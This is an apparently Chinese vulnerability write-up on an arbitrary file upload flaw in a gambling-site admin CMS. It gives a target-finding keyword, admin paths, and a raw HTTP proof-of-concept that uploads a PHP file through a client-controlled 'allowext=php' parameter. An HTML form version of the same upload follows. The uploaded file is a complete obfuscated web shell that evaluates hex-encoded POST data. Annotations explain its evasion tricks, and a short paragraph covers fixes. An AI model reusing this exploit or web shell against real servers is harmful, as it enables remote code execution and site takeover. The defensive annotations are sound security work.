某BC

lufei 297 次浏览 0

关键词:"/admin/resources/ui/DD_belatedPNG_0.0.8a-min.js"

/admin/Uploads.upload.do
/Admincenter/Public.login.do
/admin888/admincenter/public.login.do
/Runtime/Logs/Admincenter/19_05_31.log
/Uploads/   string(2) ".."  修复

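POC1(原始 HTTP 请求)

说明:请求在查询串中自行指定 allowext=php,并以 GIF89a 文件头加 .php 文件名上传;从该请求看,上传接口似乎直接采用了客户端传入的扩展名白名单(未见服务端代码,待确认)。修复方向:在服务端固定允许的扩展名并忽略请求中的 allowext,校验文件实际内容而不只看文件头,并禁止 /Uploads/ 目录解析执行脚本。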

POST /admin/Uploads.upload.do?allowext=php HTTP/1.1
Host: xxx
Content-Length: 746
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuIWTW3RsZ51ya6Sx
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ahc7elein6qs1rll0c4tf91tt0; admin_think_template=admin
Connection: close

------WebKitFormBoundaryuIWTW3RsZ51ya6Sx
Content-Disposition: form-data; name="imgFile"; filename="info.php"
Content-Type: application/octet-stream

GIF89a
<?php
/**
 * Execution primitive of the uploaded sample: the constructor stores its
 * argument in a static property and immediately passes it to eval().
 *
 * Review note: any file in an upload directory that evaluates a
 * caller-supplied string like this is a server-side code-execution backdoor.
 * The class name `_`, the property name `$phpcms` and the "error level"
 * comment describe nothing the code does; presumably they are there to look
 * innocuous.
 */
class _
{
    // Holds the last string handed to the constructor.
    static public $phpcms=Null;
    function __construct($l="error"){
        self::$phpcms=$l;
        // eval() executes the stored string as PHP. `@` suppresses error output.
        // The inline comment between `eval` and `(` and the `null.null.` prefix
        // (null concatenates as an empty string) leave the evaluated value
        // unchanged; they likely exist to defeat naive matching on `eval(`, so
        // detection rules should strip comments and whitespace before matching.
        @eval/*Defining error level offences*/(null.null.self::$phpcms);
    }
}
/**
 * Decodes a hexadecimal string into bytes, one output byte per pair of
 * input characters.
 *
 * The loop bound is strlen($hex)-1, so a trailing unpaired character is
 * ignored, and an empty string yields an empty result.
 *
 * @param string $hex Hex-encoded input.
 * @return string Decoded bytes.
 */
function hexToStr($hex){   
        $str=""; 
        // Step two characters at a time; each pair becomes one byte via hexdec() + chr().
        for($i=0;$i<strlen($hex)-1;$i+=2)
        $str.=chr(hexdec($hex[$i].$hex[$i+1]));
        return  $str;
    } 
// Entry point of the sample: reads POST field "1", hex-decodes it with
// hexToStr(), and passes the result to the `_` constructor, which evaluates it.
// `@` hides the notice raised when the field is absent, and the `/*\*/` comment
// between `$_POST` and `[` is inert. Because the field is hex-encoded, request
// bodies reaching this file will not contain readable PHP; log and WAF review
// should look for long hex strings posted to files under the upload directory.
$error = null.hexToStr(@$_POST/*\*/["1"]);
$d = new _($error);
?>
------WebKitFormBoundaryuIWTW3RsZ51ya6Sx
Content-Disposition: form-data; name="submit"

Submit
------WebKitFormBoundaryuIWTW3RsZ51ya6Sx--

POC2(与 POC1 相同的上传请求,改用 HTML 表单提交)

<!-- Form version of the POC1 request: a multipart POST carrying one file field
     named imgFile to the upload endpoint, with allowext=php supplied by the
     client in the query string. -->
<html>
<body>
<form action="/admin/Uploads.upload.do?allowext=php" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>


<input type="file" name="imgFile"/>  



<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
